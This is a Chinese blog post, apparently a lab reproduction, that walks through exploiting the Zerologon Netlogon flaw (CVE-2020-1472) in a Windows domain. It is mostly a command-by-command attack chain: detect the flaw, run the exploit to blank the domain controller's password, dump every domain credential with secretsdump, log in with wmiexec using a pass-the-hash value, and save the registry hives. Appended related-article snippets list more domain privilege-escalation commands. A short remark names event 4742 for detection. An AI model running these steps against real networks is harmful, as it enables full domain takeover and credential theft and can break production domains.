[内网渗透]—NetLogon 域内提权漏洞(CVE-2020-1472)

已于 2022-12-17 12:13:56 修改
阅读量615 收藏
点赞数
分类专栏: 内网 文章标签: 安全
于 2022-12-16 11:22:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/128340400
版权

简介

CVE-2020-1472 是⼀个 windows 域控中严重的远程权限提升漏洞,攻击者通过 NetLogon,建⽴与域控间易受攻击的安全通道时,可利⽤此漏洞获取域管访问权限(将域控中保存在AD中的管理员password设置为空);其漏洞原理是发⽣在 RPC 认证过程的过程中,由于错误的使⽤了 AES-CFB8 加密所致。

影响版本

可参考:CVE-2020-1472 - 安全更新程序指南 - Microsoft - Netlogon 特权提升漏洞

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

利用场景

获取了一个加入了域的计算机权限,在域普通账号的情况下,将域管密码置空,导出域管hash,然后进行连接

攻击流程

漏洞检测

poc:https://github.com/SecuraBV/CVE-2020-1472

1、获取域控主机名

net group "domain controllers" /domain

获取域控主机名为WIN2012$

在这里插入图片描述

2、检测域控是否存在漏洞

python zerologon_tester.py 域控主机名 域控ip

漏洞存在:

在这里插入图片描述

漏洞攻击

1、将域控密码置空

exp:https://github.com/dirkjanm/CVE-2020-1472

python cve-2020-1472-exploit.py WIN2012 192.168.52.163

在这里插入图片描述

此时如果机器重启则很可能起不来,会出问题

2、secretsdum.py导出域内所有用户的凭证

python secretsdump.py 域名/域控主机名@域控ip -no-pass
python secretsdump.py sentiment.com/WIN2012$@192.168.52.163 -no-pass >1.txt

在这里插入图片描述

3、wmiexec.py远程登录

python wmiexec.py administrator@192.168.52.163 -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634

在这里插入图片描述

恢复域控hash

前边将域控的密码置空了,所以需要恢复一下,否则可能脱域导致整个域环境瘫痪。

1、导出 sam system 等⽂件到本地,获取域控机器上本地保存之前的 hash 值⽤于恢复。

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

在这里插入图片描述

2、将sam文件导入本地

#这里没成功,所以手动拖出来了
get system.save
get sam.save
get security.save

3、删除域控内导出的文件

del /f system.save
del /f sam.save
del /f security.save

在这里插入图片描述

4、通过 sam.save、security.save、system.save ⽂件获得原来域控机器上的 Ntlm Hash 值,⽤于恢复密码

python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

在这里插入图片描述

5、通过拿到 $MACHINE.ACC: 的值,然后进行恢复

脚本:https://github.com/risksense/zerologon/blob/master/reinstall_original_pw.py

python reinstall_original_pw.py 域控机器名 域控ip $MACHINE.ACC后半部分的值
python reinstall_original_pw.py WIN2012 192.168.52.163 beadd583f50a11bac3f8df4c0e7211ea

在这里插入图片描述

6、验证密码是否恢复

python secretsdump.py sentiment.com/WIN2012$@192.168.52.163 -no-pass

再使用开始的secretsdum.py导出域内所有用户的凭证,可见使用空密码去获取域内的所有用户的凭证已经不行了

在这里插入图片描述

后记

在漏洞利用成功后,会在域控中留下4742事件,可用于蓝队检测。

在这里插入图片描述

参考

NetLogon 域内提权漏洞(CVE-2020-1472)复现过程 - 腾讯云开发者社区-腾讯云 (tencent.com)

域内提权之CVE-2020-1472复现打域控_山山而川’的博客-CSDN博客_secretsdump.py下载

S1nJa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Active Directory 服务权限提升漏洞(CVE-2022-26923)
做自己喜欢的事,并将其发挥到极致!
05-17 2781
文章目录声明一、漏洞描述二、影响范围三、Windows Active Directory (AD)四、Active Directory 证书服务五、环境配置六、漏洞复现七、修复方案八、参考链接 声明 本文章仅用于技术学习、安全研究。切勿用于非授权下渗透攻击行为,切记! 一、漏洞描述 Active Directory 权限提升漏洞 (CVE-2022-26923)允许低权限用户在安装了 Active Directory 证书服务 (AD CS) 服务器角色的默认 Active Directory 环境中
CVE-2020-1472 NetLogon 权限提升漏洞
梅花寺
08-10 750
Key对其进行AES加密,得到的结果中的第一个字节与8字节的明文input(其实就是Challenge)的第一个字节进行异或运算,将异或的结果放在IV末尾,IV整体向前移一个字节,得到新的IV。(2)重置域控Hash确定目标域控存在NetLogon权限提升,使用CVE-2020-1472.py脚本执行如下命令对其攻击:python3 cve-2020-1472-exploit.py DC 192.168.41.10结果如图所示,该脚本会将目标域控的机器账户的Hash置空,可以看到攻击成功。
Windows域控常见0day及利用漏洞汇集
Ms08067安全实验室
01-10 2672
本文对近几年出现的Windows域控相关漏洞及利用方法进行整理,方便检测存在的漏洞,目前来看主要集中在本地权限提升、打印机服务利用、exchange等。 1.1Kerberos 校验和漏洞MS14-068(CVE-2014-6324) Microsoft Windows Server 2003 SP2、Windows Vista SP2、Windows Server 2008...
第106天:权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞
最新发布
weixin_71529930的博客
06-21 750
certipy req 'ip/用户名:密码@域控计算机名' -target-ip 域控ip -ca abc-DC1-CA -template User -debug。python3 sam_the_admin.py 名/'域控主机账号:密码' -dc-ip 域控ip -shell。ms14-068.exe -u 成员名@名 -p 成员密码 -s 成员sid -d 域控制器地址。只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞。查看ip已经变成了域控机的ip。
域控常见漏洞复现
叶子的Blog
06-02 2435
略 PC1 whoamianony.org 得到域控的ip和域控是谁 内网资产搜集 抓到了管理员的hash 横向移动(at) 将本地的shellcode复制copy到域控机器的c盘下 通过at命令制定计划进行命令执行。注意事项 条件 账户不在里面 换一个进程 成功! 利用WMI上线主机,并且正向连接内网生成监听器beacon-tcp 生成木马 拿下域控了 然后就可以访问了 使用exp将域控密码设置为空: 使用impacket包中的secretsdum.py来
CVE-2022-26923提权漏洞
m0_46377671的博客
05-24 3129
CVE-2022-26923提权漏洞 参考链接: http://www.ctfiot.com/40081.html https://tryhackme.com/room/cve202226923 https://www.bilibili.com/video/BV1hL4y1F79y?spm_id_from=333.337.search-card.all.click 1.漏洞背景 Windows Active Directory (AD) 不仅用于身份和访问管理,还提供大量服务来帮助您运行和管理您的组织,其
CVE-2020-1472 NetLogon 特权提升漏洞1
08-03
CVE-2020-1472 NetLogon 特权提升漏洞1
CVE-2020-1472:CVE-2020-1472的测试工具
03-16
使用Impacket库测试Zerologon漏洞CVE-2020-1472)的漏洞的Python脚本。 它尝试执行Netlogon身份验证绕过。 成功执行旁路时,脚本将立即终止,并且不执行任何Netlogon操作。 修补域控制器后,检测脚本将在发送2000...
CVE-2020-1472:CVE-2020-1472亦称Zerologon的利用代码
03-18
CVE-2020-1472 CVE-2020-1472又称为Zerologon的检查和利用代码 测试域控制器是否容易受到Zerologon攻击,如果容易受到攻击,它将把域控制器的帐户密码重置为空字符串。 注意:它可能会破坏生产环境中的内容(例如...
Zerologon-CVE-2020-1472-master
09-11
【Zerologon-CVE-2020-1472】是2020年发现的一个严重网络安全漏洞,主要影响的是微软的Windows Server操作系统。这个漏洞被命名为"Zerologon",因为它允许攻击者在没有密码或任何身份验证的情况下完全控制网络中的...
zerologon:RPCTCP和RPCSMB的CVE-2020-1472的测试脚本
05-04
证明CVE-2020-1472可以通过RPC / SMB来完成,而不仅可以通过RPC / TCP来完成。 另外,最终的客户端挑战和客户端凭证中有一个随机字节-用于测试琐碎的IDS签名。 RPC / SMB扫描默认运行。 根据目标服务器的不同,...
环境权限提升
2301_76786857的博客
01-18 1301
权限提升是指攻击者利用操作系统或软件应用程序中的漏洞、设计缺陷或配置疏忽,让应用或用户获得对受保护资源的高级访问权限。 攻击者成为用户之后,若想要完全控制该,需要进行权限提升,即成为管理员,以管理员身份进行进一步的操作。可以通过中间人攻击、不安全的凭证等操作进行权限的提升。
域控安全渗透
m0_59598029的博客
02-25 617
在通常情况下、即使拥有管理员权限,也无法读取域控制器中的C:\Windwos\NTDS\ntds.dit文件(活动目录始终访问这个文件,所以文件被禁止读取)。使用Windows本地卷影拷贝服务可以获得文件的副本。在活动目录中,所有的数据都保存在ntds.dit文件中。ntds.dit是一个二进制文件,存储位置为域控制器的。ntds.dit中包含(但不限于)用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样,是被Windows操作系统锁定的。
提权CVE-2021-42278漏洞复现
一只爱吃橙子的羊
11-21 1239
提权CVE-2021-42278漏洞复现,本文仅为验证漏洞,在本地环境测试验证,无其它目的。
渗透04-漏洞CVE-2020-1472
GalaxySpaceX的博客
10-12 488
渗透04-漏洞CVE-2020-1472
提权 (CVE-2021-42278 & CVE-2021-42287) 漏洞利用
Captain_RB的博客
07-03 2948
2021年11月,Microsoft 曝出了两个关于 Windows AD 提权漏洞CVE-2021-42278 & CVE-2021-42287,CVSS V3.1评分均为8.8,两个漏洞组合可导致内普通用户提升至管权限,文章主要对漏洞利用使用的两种自动化脚本进行介绍。...............
渗透笔记-ADCS 提权-ESC1
NoooEmotion的博客
02-02 1590
AD CS(Active Directory 证书服务)中的企业CA使用证书模板定义设置颁发证书,这些证书模板是注册策略和预定义证书设置的集合,并包含诸如此证书的有效期是多长?、证书的用途是什么?、主题是如何指定的?、谁可以申请证书?,以及无数其他设置。证书模板有一组特定的设置,这使得它们非常容易受到攻击。
内网渗透环境探索和简单提权
m0_70349048的博客
03-31 370
因为域控可以登录内所有管辖的主机,因此登录过程中的密码会被记录下来,即winlog进程把密码拿到,发给后面的lasss,然后还会进行hash加密保存到SAM中。假如我么已经拿下了一个普通主机,想要登录权限更大的域控,我们的目的就是获取域控的密码,明文更好,hash后的也能用。内主机就作为普通的机器,只有普通的权限,一般我们拿下跳板机之后,就会拿下普通的主机,然后想办法提权或者进入域控域控服务器是管理环境的,相当于“领导”,可以划分,提供服务,并且可以登录内的任何一台机器。
CVE-2020-1472
08-30
CVE-2020-1472是一个Windows域控中的严重的远程权限提升漏洞。该漏洞是由于微软在Netlogon协议中错误使用加密算法而引起的。在进行AES加密运算时,微软使用了AES-CFB8模式并错误地将初始化向量(IV)设置为全零。这使得在攻击者可以控制明文(客户端挑战)和IV等要素的情况下,存在较高的概率生成全零的密文。这个漏洞可能被攻击者利用来远程提升权限,并在Windows域控服务器上执行恶意操作。 为了利用该漏洞,可以使用提供的CVE-2020-1472-exploit.py脚本来攻击目标服务器。该脚本可以通过指定的命令行参数来执行攻击,例如"python3 cve-2020-1472-exploit.py dc$ 192.168.10.10"。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2020-1472 ZeroLogon漏洞分析利用](https://blog.csdn.net/qq_50854790/article/details/123121372)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2020-1472 NetLogon 权限提升漏洞](https://blog.csdn.net/qq_53579360/article/details/128923909)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值